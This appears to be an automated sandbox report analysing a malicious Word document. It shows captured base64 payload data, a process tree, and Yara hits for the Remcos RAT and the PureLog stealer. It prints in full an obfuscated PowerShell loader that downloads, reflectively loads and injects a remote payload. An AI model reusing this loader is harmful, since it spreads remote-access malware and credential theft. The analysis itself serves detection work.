                                                                2024-10-07 20:41:10 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                                Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                                Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                                Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                                Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                                Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                                Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                                Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                                Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                                2024-10-07 20:41:10 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                                Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:16:41:00
                                                                Start date:07/10/2024
                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                Imagebase:0x13ff10000
                                                                File size:1'423'704 bytes
                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:2
                                                                Start time:16:41:01
                                                                Start date:07/10/2024
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                Imagebase:0x400000
                                                                File size:543'304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:16:41:05
                                                                Start date:07/10/2024
                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS"
                                                                Imagebase:0xf40000
                                                                File size:141'824 bytes
                                                                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:16:41:05
                                                                Start date:07/10/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                Imagebase:0x330000
                                                                File size:427'008 bytes
                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:16:41:07
                                                                Start date:07/10/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"
                                                                Imagebase:0x330000
                                                                File size:427'008 bytes
                                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.381541630.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.378809555.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:16:41:13
                                                                Start date:07/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                Imagebase:0x1070000
                                                                File size:64'704 bytes
                                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.873432773.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:16:41:25
                                                                Start date:07/10/2024
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                Imagebase:0x400000
                                                                File size:543'304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.355352588.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059F000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_59f000_EQNEDT32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6dddbb7087d6842d3dc56c36837d0461a2cc5f9e4eebaa0d0235aee900a0c29
                                                                  • Instruction ID: d9ca964e905b72b3d49a17e620aa27bf00f6e5b820cb412fa9ee83fde14b8687
                                                                  • Opcode Fuzzy Hash: e6dddbb7087d6842d3dc56c36837d0461a2cc5f9e4eebaa0d0235aee900a0c29
                                                                  • Instruction Fuzzy Hash: C221A7A6A8F7D25FC3039B385C611807FB4AE9322871B46EBC080CF5B3E519495AC723
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.382005799.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1ed000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 100e5eec39afebc90d1d339fbac11505dbdf31cc554a45e93f25534b4f51a289
                                                                  • Instruction ID: e7cd8cf49b5b56690198326d5a90408d494ea66ff7fdd1c7698d7db47d383984
                                                                  • Opcode Fuzzy Hash: 100e5eec39afebc90d1d339fbac11505dbdf31cc554a45e93f25534b4f51a289
                                                                  • Instruction Fuzzy Hash: 1201F231104780AAE7205E26E8C4B6BFB98DF81324F2CC01AFD481B282C3799941CAB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.382005799.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1ed000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 848559c581c06a7421f93d9f7441c4e7af22a806f8b252d3e8dba0139485335d
                                                                  • Instruction ID: d70241e11515f5ea66750ea95fe745c84939ddbb45a4107d474b3eae9ed0776c
                                                                  • Opcode Fuzzy Hash: 848559c581c06a7421f93d9f7441c4e7af22a806f8b252d3e8dba0139485335d
                                                                  • Instruction Fuzzy Hash: 0E014C7100E3C09FE7128B259C94B56BFB4DF43224F1D81DBE9888F1A3C2695848CB72

                                                                  Execution Graph

                                                                  Execution Coverage:7.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:3.2%
                                                                  Total number of Nodes:94
                                                                  Total number of Limit Nodes:3
                                                                  execution_graph 12638 295ef8 12640 295f20 12638->12640 12639 296135 12640->12639 12642 29ef38 12640->12642 12643 29ef5d 12642->12643 12647 2190aa8 12643->12647 12661 2190a97 12643->12661 12644 29ef79 12644->12640 12648 2190acf 12647->12648 12649 2190b9b 12648->12649 12675 2191343 12648->12675 12680 2191c30 12648->12680 12685 2191dc1 12648->12685 12690 2191551 12648->12690 12695 219167e 12648->12695 12699 219107e 12648->12699 12704 21911b8 12648->12704 12707 21915c6 12648->12707 12711 21919b7 12648->12711 12716 2190ec4 12648->12716 12720 2190f75 12648->12720 12649->12644 12662 2190aa8 12661->12662 12663 2190b9b 12662->12663 12664 21911b8 WriteProcessMemory 12662->12664 12665 219107e ResumeThread 12662->12665 12666 219167e WriteProcessMemory 12662->12666 12667 2191551 2 API calls 12662->12667 12668 2191dc1 2 API calls 12662->12668 12669 2191c30 ResumeThread 12662->12669 12670 2191343 ResumeThread 12662->12670 12671 2190f75 WriteProcessMemory 12662->12671 12672 2190ec4 2 API calls 12662->12672 12673 21919b7 ResumeThread 12662->12673 12674 21915c6 WriteProcessMemory 12662->12674 12663->12644 12664->12662 12665->12662 12666->12662 12667->12662 12668->12662 12669->12662 12670->12662 12671->12662 12672->12662 12673->12662 12674->12662 12676 2191c56 12675->12676 12677 2190d50 12675->12677 12723 2192988 